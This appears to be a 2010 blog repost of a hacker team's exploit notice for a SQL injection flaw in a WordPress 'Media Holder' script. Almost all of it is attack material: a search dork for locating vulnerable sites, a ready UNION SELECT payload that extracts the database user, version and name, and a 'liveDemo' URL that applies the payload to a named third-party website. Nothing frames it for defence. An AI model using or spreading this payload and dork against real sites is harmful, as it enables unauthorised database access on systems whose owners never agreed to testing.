Selasa, 02 Februari 2010

WordPress Media Holder (id) Sql injetion vulnerability!

Php Code
-------------------------------------------------------------------
WordPress Media Holder (id) Sql injetion vulnerability!
-------------------------------------------------------------------
-------------------------------------------------------------------
Author: Bobyhikaru
Greetz: Indonesian Hacker Team
Site : www.indonesianhacker.org- [Indonesian Hacker Team]
-------------------------------------------------------------------


-------------------------------------------------------------------
Dork: mediaHolder.php?id
-------------------------------------------------------------------
Exp: http://localHost/mediaHolder.php?id=[exploit]
-------------------------------------------------------------------
exploit: -9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
liveDemo:
http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
www.bobyhikaru.net

original credit by : boom3rang
-------------------------------------------------------------------
Diposting oleh Reynald di 12.29

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)